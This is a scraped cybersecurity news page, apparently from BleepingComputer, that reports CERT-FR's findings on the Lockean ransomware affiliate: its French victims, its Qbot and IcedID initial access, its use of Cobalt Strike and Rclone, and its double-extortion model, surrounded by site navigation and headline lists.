Ukraine links members of Gamaredon hacker group to Russian FSB
Samsung Galaxy S21 hacked on second day of Pwn2Own Austin
Microsoft Exchange ProxyShell exploits used to deploy Babuk ransomware
US targets DarkSide ransomware, rebrands with $10 million reward
FBI warns of increased use of cryptocurrency ATMs, QR codes for fraud
Mozilla Thunderbird 91.3 released to fix high impact flaws
Pre-Black Friday Sale: Learn ethical hacking with 120 hours of content
US targets DarkSide ransomware, rebrands with $10 million reward
Qualys BrowserCheck
Junkware Removal Tool
How to remove the PBlock+ adware browser extension
Remove the Search Redirect
Remove the Search Redirect
Remove the Search Redirect
Remove Security Tool and SecurityTool (Uninstall Guide)
How to remove Antivirus 2009 (Uninstall Instructions)
How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
Locky Ransomware Information, Help Guide, and FAQ
CryptoLocker Ransomware Information Guide and FAQ
CryptorBit and HowDecrypt Information Guide and FAQ
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
How to make the Start menu full screen in Windows 10
How to install the Microsoft Visual C++ 2015 Runtime
How to open an elevated PowerShell Admin prompt in Windows 10
How to Translate a Web Page in Google Chrome
How to start Windows in Safe Mode
How to remove a Trojan, Virus, Worm, or other Malware
How to show hidden files in Windows 7
How to see hidden files in Windows
IT Certification Courses
Gear + Gadgets
Ransomware affiliate
Details about the tools and tactics used by a ransomware affiliate group, now tracked as Lockean, have emerged today in a report from France’s Computer Emergency Response Team (CERT).
Over the past year and a half, the threat actor has compromised the networks of at least eight French companies, stealing data and deploying malware from multiple ransomware-as-a-service (RaaS) operations.
Lockean activity was first noticed in 2020 when the actor hit a French company in the manufacturing sector and deployed DoppelPaymer ransomware on the network.
Between June 2020 and March 2021, Lockean attacked at least seven more companies with various ransomware families: Maze, Egregor, ProLock, REvil.
Activity of the Lockean ransomware affiliate
Among compromised businesses are transport company Gefco, the Ouest-France newspaper, and the pharmaceutical companies Fareva and Pierre Fabre.
Four additional companies, unnamed by CERT-FR, were identified as victims of Lockean from reports to ANSSI, France’s national cybersecurity agency, and two incidents described by private organizations Intrinsec and The DFIR Report.
Lockean ransomware affiliations
In most of the attacks described in the report, the threat actor gained initial access to the victim network through Qbot/QakBot, a banking trojan that changed its role to distribute other malware, including ransomware strains ProLock, Egregor, and DoppelPaymer.
Qbot was spread through emails from the now-defunct Emotet botnet as well as a less known malware distribution service tracked as TA551, a.k.a. Shathak, UNC2420, and Gold Cabin.
In at least one known instance, Lockean used the IcedID malware distribution service to get access to the network.
Lockean initial access via Qbot/QakBot
For lateral movement, the threat actor used the Cobalt Strike penetration testing framework, and the freely available Adfind, BloodHound, and BITSadmin tools.
CERT-FR notes in the report that Lockean’s average cut of paid ransoms was 70%, the rest going to the RaaS maintainers.
To increase the profit, the actor adopted the double-extortion model and stole data from the victim (via the Rclone tool) before encrypting the machines.
Under the threat of a data leak, which carries larger privacy and legal implications, victims were more likely to pay a negotiated ransom.
From start to finish, a typical Lockean intrusion would look as follows:
Lockean group - infection chain
While CERT-FR’s data on Lockean’s tactics, techniques, and procedures is based on eight incidents, the group is likely more active than that and hit a larger number of companies.
Looking at the indicators of compromise in the report, Valery Marchive of LegMagIT found several IP addresses related to Conti ransomware, indicating Lockean’s affiliation to additional RaaS operations and targeting of businesses in other regions.
Lockean is the second ransomware affiliate identified this year. In August, the FBI shared information about OnePercent, an actor that has been hitting organizations in the U.S. with various ransomware strains.
Like Lockean, OnePercent is affiliated with multiple RaaS operations (Maze, Egregor, REvil) and stole data before deploying the file-encryption routine.
The Week in Ransomware – October 29th 2021 – Making arrests
German investigators identify REvil ransomware gang core member
Ransomware gangs use SEO poisoning to infect visitors
The Week in Ransomware – October 22nd 2021 – Striking back
Free REvil ransomware master decrypter released for past victims
Not a member yet? Register Now
Popular ‘coa’ NPM library hijacked to steal user passwords
BlackMatter ransomware claims to be shutting down due to police pressure
To receive periodic updates and news from BleepingComputer, please use the form below.
Terms of Use Privacy PolicyEthics Statement
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Not a member yet? Register Now
Read our posting guidelinese to learn what content is prohibited.


You May Also Like

Cloudflare is experiencing widespread latency and timeouts

Microsoft December 2021 Patch Tuesday fixes 6 zero-days, 67 flawsNew ransomware now…

Softbank plans to charge electronic gadgets using 5G antennas

State hackers breach defense, energy, healthcare orgs worldwideMediaMarkt hit by Hive ransomware,…

FBI system hacked to email 'urgent' warning about fake cyberattacks

FBI system hacked to email ‘urgent’ warning about fake cyberattacksNew Windows 11…

Hackers infect random WordPress plugins to steal credit cards

Emotet now drops Cobalt Strike, fast forwards ransomware attacksSonicWall ‘strongly urges’ customers…